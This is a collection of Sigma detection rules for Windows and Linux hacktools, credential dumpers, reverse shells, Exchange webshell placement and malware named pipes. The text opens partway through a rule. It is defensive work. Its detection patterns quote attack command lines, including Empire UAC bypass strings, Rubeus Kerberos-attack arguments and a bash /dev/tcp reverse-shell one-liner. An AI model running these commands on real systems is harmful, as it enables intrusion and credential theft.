falsepositives:
    - Very unlikely
level: critical
critical
HackTool - Empire PowerShell UAC Bypass
Detects some Empire PowerShell UAC bypass methods
status stable author Ecco id 3268b746-88d8-4cd3-bffc-30077d02c787
view Sigma YAML 
title: HackTool - Empire PowerShell UAC Bypass
id: 3268b746-88d8-4cd3-bffc-30077d02c787
status: stable
description: Detects some Empire PowerShell UAC bypass methods
references:
    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64
author: Ecco
date: 2019-08-30
modified: 2023-02-21
tags:
    - attack.privilege-escalation
    - attack.t1548.002
    - car.2019-04-001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update)'
            - ' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
HackTool - F-Secure C3 Load by Rundll32
F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
status test author Alfie Champion (ajpc500) id b18c9d4c-fac9-4708-bd06-dd5bfacf200f
view Sigma YAML 
title: HackTool - F-Secure C3 Load by Rundll32
id: b18c9d4c-fac9-4708-bd06-dd5bfacf200f
status: test
description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
references:
    - https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12
author: Alfie Champion (ajpc500)
date: 2021-06-02
modified: 2023-03-05
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'rundll32.exe'
            - '.dll'
            - 'StartNodeRelay'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
HackTool - Inveigh Execution
Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
status test author Nasreddine Bencherchali (Nextron Systems) id b99a1518-1ad5-4f65-bc95-1ffff97a8fd0
view Sigma YAML 
title: HackTool - Inveigh Execution
id: b99a1518-1ad5-4f65-bc95-1ffff97a8fd0
status: test
description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
references:
    - https://github.com/Kevin-Robertson/Inveigh
    - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-24
modified: 2023-02-04
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\Inveigh.exe'
        - OriginalFileName:
              - '\Inveigh.exe'
              - '\Inveigh.dll'
        - Description: 'Inveigh'
        - CommandLine|contains:
              - ' -SpooferIP'
              - ' -ReplyToIPs '
              - ' -ReplyToDomains '
              - ' -ReplyToMACs '
              - ' -SnifferIP'
    condition: selection
falsepositives:
    - Very unlikely
level: critical
critical
HackTool - Inveigh Execution Artefacts
Detects the presence and execution of Inveigh via dropped artefacts
status test author Nasreddine Bencherchali (Nextron Systems) id bb09dd3e-2b78-4819-8e35-a7c1b874e449
view Sigma YAML 
title: HackTool - Inveigh Execution Artefacts
id: bb09dd3e-2b78-4819-8e35-a7c1b874e449
status: test
description: Detects the presence and execution of Inveigh via dropped artefacts
references:
    - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs
    - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs
    - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-24
modified: 2024-06-27
tags:
    - attack.command-and-control
    - attack.t1219.002
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - '\Inveigh-Log.txt'
            - '\Inveigh-Cleartext.txt'
            - '\Inveigh-NTLMv1Users.txt'
            - '\Inveigh-NTLMv2Users.txt'
            - '\Inveigh-NTLMv1.txt'
            - '\Inveigh-NTLMv2.txt'
            - '\Inveigh-FormInput.txt'
            - '\Inveigh.dll'
            - '\Inveigh.exe'
            - '\Inveigh.ps1'
            - '\Inveigh-Relay.ps1'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - Koh Default Named Pipe
Detects creation of default named pipes used by the Koh tool
status test author Nasreddine Bencherchali (Nextron Systems) id 0adc67e0-a68f-4ffd-9c43-28905aad5d6a
view Sigma YAML 
title: HackTool - Koh Default Named Pipe
id: 0adc67e0-a68f-4ffd-9c43-28905aad5d6a
status: test
description: Detects creation of default named pipes used by the Koh tool
references:
    - https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-08
modified: 2023-08-07
tags:
    - attack.privilege-escalation
    - attack.credential-access
    - attack.stealth
    - attack.t1528
    - attack.t1134.001
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName|contains:
            - '\imposecost'
            - '\imposingcost'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - Mimikatz Kirbi File Creation
Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
status test author Florian Roth (Nextron Systems), David ANDRE id 9e099d99-44c2-42b6-a6d8-54c3545cab29
view Sigma YAML 
title: HackTool - Mimikatz Kirbi File Creation
id: 9e099d99-44c2-42b6-a6d8-54c3545cab29
related:
    - id: 034affe8-6170-11ec-844f-0f78aa0c4d66
      type: obsolete
status: test
description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
references:
    - https://cobalt.io/blog/kerberoast-attack-techniques
    - https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
author: Florian Roth (Nextron Systems), David ANDRE
date: 2021-11-08
modified: 2024-06-27
tags:
    - attack.credential-access
    - attack.t1558
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith:
            - '.kirbi' # Kerberos tickets
            - 'mimilsa.log' # MemSSP default file
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - PurpleSharp Execution
Detects the execution of the PurpleSharp adversary simulation tool
status test author Florian Roth (Nextron Systems) id ff23ffbc-3378-435e-992f-0624dcf93ab4
view Sigma YAML 
title: HackTool - PurpleSharp Execution
id: ff23ffbc-3378-435e-992f-0624dcf93ab4
status: test
description: Detects the execution of the PurpleSharp adversary simulation tool
references:
    - https://github.com/mvelazc0/PurpleSharp
author: Florian Roth (Nextron Systems)
date: 2021-06-18
modified: 2023-02-05
tags:
    - attack.t1587
    - attack.resource-development
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|contains: '\purplesharp'
        - OriginalFileName: 'PurpleSharp.exe'
    selection_cli:
        CommandLine|contains:
            - 'xyz123456.exe'
            - 'PurpleSharp'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical
critical
HackTool - QuarksPwDump Dump File
Detects a dump file written by QuarksPwDump password dumper
status test author Florian Roth (Nextron Systems) id 847def9e-924d-4e90-b7c4-5f581395a2b4
view Sigma YAML 
title: HackTool - QuarksPwDump Dump File
id: 847def9e-924d-4e90-b7c4-5f581395a2b4
status: test
description: Detects a dump file written by QuarksPwDump password dumper
references:
    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
author: Florian Roth (Nextron Systems)
date: 2018-02-10
modified: 2024-06-27
tags:
    - attack.credential-access
    - attack.t1003.002
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|contains|all:
            - '\AppData\Local\Temp\SAM-'
            - '.dmp'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
HackTool - Rubeus Execution
Detects the execution of the hacktool Rubeus via PE information of command line parameters
status stable author Florian Roth (Nextron Systems) id 7ec2c172-dceb-4c10-92c9-87c1881b7e18
view Sigma YAML 
title: HackTool - Rubeus Execution
id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
related:
    - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
      type: similar
status: stable
description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
references:
    - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus
    - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
    - https://github.com/GhostPack/Rubeus
author: Florian Roth (Nextron Systems)
date: 2018-12-19
modified: 2023-04-20
tags:
    - attack.credential-access
    - attack.t1003
    - attack.t1558.003
    - attack.lateral-movement
    - attack.t1550.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\Rubeus.exe'
        - OriginalFileName: 'Rubeus.exe'
        - Description: 'Rubeus'
        - CommandLine|contains:
              - 'asreproast '
              - 'dump /service:krbtgt '
              - 'dump /luid:0x'
              - 'kerberoast '
              - 'createnetonly /program:'
              - 'ptt /ticket:'
              - '/impersonateuser:'
              - 'renew /ticket:'
              - 'asktgt /user:'
              - 'harvest /interval:'
              - 's4u /user:'
              - 's4u /ticket:'
              - 'hash /password:'
              - 'golden /aes256:'
              - 'silver /user:'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - SafetyKatz Execution
Detects the execution of the hacktool SafetyKatz via PE information and default Image name
status test author Nasreddine Bencherchali (Nextron Systems) id b1876533-4ed5-4a83-90f3-b8645840a413
view Sigma YAML 
title: HackTool - SafetyKatz Execution
id: b1876533-4ed5-4a83-90f3-b8645840a413
status: test
description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
references:
    - https://github.com/GhostPack/SafetyKatz
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-20
modified: 2023-02-04
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\SafetyKatz.exe'
        - OriginalFileName: 'SafetyKatz.exe'
        - Description: 'SafetyKatz'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - SecurityXploded Execution
Detects the execution of SecurityXploded Tools
status stable author Florian Roth (Nextron Systems) id 7679d464-4f74-45e2-9e01-ac66c5eb041a
view Sigma YAML 
title: HackTool - SecurityXploded Execution
id: 7679d464-4f74-45e2-9e01-ac66c5eb041a
status: stable
description: Detects the execution of SecurityXploded Tools
references:
    - https://securityxploded.com/
    - https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/
author: Florian Roth (Nextron Systems)
date: 2018-12-19
modified: 2023-02-04
tags:
    - attack.credential-access
    - attack.t1555
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Company: SecurityXploded
        - Image|endswith: 'PasswordDump.exe'
        - OriginalFileName|endswith: 'PasswordDump.exe'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - SharpUp PrivEsc Tool Execution
Detects the use of SharpUp, a tool for local privilege escalation
status test author Florian Roth (Nextron Systems) id c484e533-ee16-4a93-b6ac-f0ea4868b2f1
view Sigma YAML 
title: HackTool - SharpUp PrivEsc Tool Execution
id: c484e533-ee16-4a93-b6ac-f0ea4868b2f1
status: test
description: Detects the use of SharpUp, a tool for local privilege escalation
references:
    - https://github.com/GhostPack/SharpUp
author: Florian Roth (Nextron Systems)
date: 2022-08-20
modified: 2023-02-13
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.discovery
    - attack.execution
    - attack.stealth
    - attack.t1615
    - attack.t1569.002
    - attack.t1574.005
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\SharpUp.exe'
        - Description: 'SharpUp'
        - CommandLine|contains:
              - 'HijackablePaths'
              - 'UnquotedServicePath'
              - 'ProcessDLLHijack'
              - 'ModifiableServiceBinaries'
              - 'ModifiableScheduledTask'
              - 'DomainGPPPassword'
              - 'CachedGPPPassword'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
HackTool - Sliver C2 Implant Activity Pattern
Detects process activity patterns as seen being used by Sliver C2 framework implants
status test author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) id 42333b2c-b425-441c-b70e-99404a17170f
view Sigma YAML 
title: HackTool - Sliver C2 Implant Activity Pattern
id: 42333b2c-b425-441c-b70e-99404a17170f
status: test
description: Detects process activity patterns as seen being used by Sliver C2 framework implants
references:
    - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36
    - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
date: 2022-08-25
modified: 2023-03-05
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: '-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - SysmonEOP Execution
Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
status test author Florian Roth (Nextron Systems) id 8a7e90c5-fe6e-45dc-889e-057fe4378bd9
view Sigma YAML 
title: HackTool - SysmonEOP Execution
id: 8a7e90c5-fe6e-45dc-889e-057fe4378bd9
status: test
description: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
references:
    - https://github.com/Wh04m1001/SysmonEoP
author: Florian Roth (Nextron Systems)
date: 2022-12-04
modified: 2024-11-23
tags:
    - cve.2022-41120
    - attack.t1068
    - attack.privilege-escalation
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\SysmonEOP.exe'
    selection_hash:
        Hashes|contains:
            - 'IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5'
            - 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical
critical
HackTool - Windows Credential Editor (WCE) Execution
Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory. It is often used by threat actors for credential dumping and lateral movement within compromised networks.
status test author Florian Roth (Nextron Systems) id 7aa7009a-28b9-4344-8c1f-159489a390df
view Sigma YAML 
title: HackTool - Windows Credential Editor (WCE) Execution
id: 7aa7009a-28b9-4344-8c1f-159489a390df
status: test
description: |
    Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory.
    It is often used by threat actors for credential dumping and lateral movement within compromised networks.
references:
    - https://www.ampliasecurity.com/research/windows-credentials-editor/
author: Florian Roth (Nextron Systems)
date: 2019-12-31
modified: 2025-10-21
tags:
    - attack.credential-access
    - attack.t1003.001
    - attack.s0005
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\WCE.exe'
            - '\WCE64.exe'
    selection_hash:
        Hashes|contains:
            - 'IMPHASH=136F0A8572C058A96436C82E541E4C41'
            - 'IMPHASH=589657C64DDE88533186C39F82FA1F50'
            - 'IMPHASH=6BFE09EFCB4FFDE061EBDBAFC4DB84CF'
            - 'IMPHASH=7D490037BF450877E6D0287BDCFF8D2E'
            - 'IMPHASH=8AB93B061287C79F3088C5BC7E7D97ED'
            - 'IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F'
            - 'IMPHASH=BA434A7A729EEC20E136CA4C32D6C740'
            - 'IMPHASH=BD1D1547DA13C0FCB6C15E86217D5EB8'
            - 'IMPHASH=E96A73C7BF33A464C510EDE582318BF2'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: critical
critical
Hacktool Execution - Imphash
Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
status test author Florian Roth (Nextron Systems) id 24e3e58a-646b-4b50-adef-02ef935b9fc8
view Sigma YAML 
title: Hacktool Execution - Imphash
id: 24e3e58a-646b-4b50-adef-02ef935b9fc8
status: test
description: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
references:
    - Internal Research
author: Florian Roth (Nextron Systems)
date: 2022-03-04
modified: 2024-11-23
tags:
    - attack.credential-access
    - attack.resource-development
    - attack.t1588.002
    - attack.t1003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Hashes|contains: # Sysmon field hashes contains all types
            - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam
            - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam
            - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam
            - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato
            - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato
            - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG
            - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato
            - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato
            - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato
            - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato
            - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump
            - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump
            - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump
            - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump
            - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump
            - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump
            - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump
            - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump
            - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump
            - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX
            - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump
            - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump
            - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump
            - IMPHASH=730073214094CD328547BF1F72289752 # Htran
            - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons
            - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons
            - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons
            - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons
            - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump
            - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump
            - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump
            - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump
            - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump
            - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump
            - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump
            - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump
            - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump
            - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump
            - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump
            - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump
            - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump
            - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump
            - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump
            - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump
            - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump
            - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz
            - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz
            - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader
            - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader
            - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader
            - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader
            - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump
            - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi
            - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi
            - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi
            - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi
            - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi
            - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi
            - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi
            - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi
            - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi
            - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi
            - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi
            - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE
            - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE
            - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers
            - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert
            - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert
            - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert
            - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte
            - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet
            - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook
            - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz
            - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller
            - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller
            - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab
            - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab
            - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab
            - IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia
            - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast
            - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast
            - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast
            - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast
            - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast
            - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast
            - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast
            - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer
            - IMPHASH=B50199E952C875241B9CE06C971CE3C1 # EventLogCrasher
    condition: selection
falsepositives:
    - Legitimate use of one of these tools
level: critical
critical
Linux Reverse Shell Indicator
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
status test author Florian Roth (Nextron Systems) id 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
view Sigma YAML 
title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: test
description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
references:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
author: Florian Roth (Nextron Systems)
date: 2021-10-16
modified: 2022-12-25
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: linux
    category: network_connection
detection:
    selection:
        Image|endswith: '/bin/bash'
    filter:
        DestinationIp:
            - '127.0.0.1'
            - '0.0.0.0'
    condition: selection and not filter
falsepositives:
    - Unknown
level: critical
critical
Mailbox Export to Exchange Webserver
Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it
status test author Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems) id 516376b4-05cd-4122-bae0-ad7641c38d48
view Sigma YAML 
title: Mailbox Export to Exchange Webserver
id: 516376b4-05cd-4122-bae0-ad7641c38d48
status: test
description: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it
references:
    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
author: Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems)
date: 2021-08-09
modified: 2023-04-30
tags:
    - attack.persistence
    - attack.t1505.003
logsource:
    service: msexchange-management
    product: windows
detection:
    export_command:
        '|all':
            - 'New-MailboxExportRequest'
            - ' -Mailbox '
    export_params:
        - '-FilePath "\\\\' # We care about any share location.
        - '.aspx'
    role_assignment:
        '|all':
            - 'New-ManagementRoleAssignment'
            - ' -Role "Mailbox Import Export"'
            - ' -User '
    condition: (export_command and export_params) or role_assignment
falsepositives:
    - Unlikely
level: critical
critical
Malicious Named Pipe Created
Detects the creation of a named pipe seen used by known APTs or malware.
status test author Florian Roth (Nextron Systems), blueteam0ps, elhoim id fe3ac066-98bb-432a-b1e7-a5229cb39d4a
view Sigma YAML 
title: Malicious Named Pipe Created
id: fe3ac066-98bb-432a-b1e7-a5229cb39d4a
status: test
description: Detects the creation of a named pipe seen used by known APTs or malware.
references:
    - https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/
    - https://securelist.com/faq-the-projectsauron-apt/75533/
    - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
    - https://www.us-cert.gov/ncas/alerts/TA17-117A
    - https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
    - https://thedfirreport.com/2020/06/21/snatch-ransomware/
    - https://github.com/RiccardoAncarani/LiquidSnake
    - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
    - https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a
    - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf
    - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: Florian Roth (Nextron Systems), blueteam0ps, elhoim
date: 2017-11-06
modified: 2023-08-07
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName:
            - '\46a676ab7f179e511e30dd2dc41bd388'  # Project Sauron
            - '\583da945-62af-10e8-4902-a8f205c72b2e'  # SolarWinds SUNBURST malware
            - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7'  # LiquidSnake
            - '\9f81f59bc58452127884ce513865ed20'  # Project Sauron
            - '\adschemerpc'  # Turla HyperStack
            - '\ahexec'  # Sofacy group malware
            - '\AnonymousPipe'  # Hidden Cobra Hoplight
            - '\bc31a7'  # Pacifier
            - '\bc367'  # Pacifier
            - '\bizkaz'  # Snatch Ransomware
            - '\csexecsvc' # CSEXEC default
            - '\dce_3d' # Qbot
            - '\e710f28d59aa529d6792ca6ff0ca1b34'  # Project Sauron
            - '\gruntsvc' # Covenant default
            - '\isapi_dg'  # Uroburos Malware
            - '\isapi_dg2'  # Uroburos Malware
            - '\isapi_http'  # Uroburos Malware
            - '\jaccdpqnvbrrxlaf' # PoshC2 default
            - '\lsassw'  # Wild Neutron APT malware
            - '\NamePipe_MoreWindows'  # Cloud Hopper - RedLeaves
            - '\pcheap_reuse'  # Pipe used by Equation Group malware
            - '\Posh*' # PoshC2 default
            - '\rpchlp_3'  # Project Sauron
            - '\sdlrpc'  # Cobra Trojan
            - '\svcctl' # Crackmapexec smbexec default
            - '\testPipe'  # Emissary Panda Hyperbro
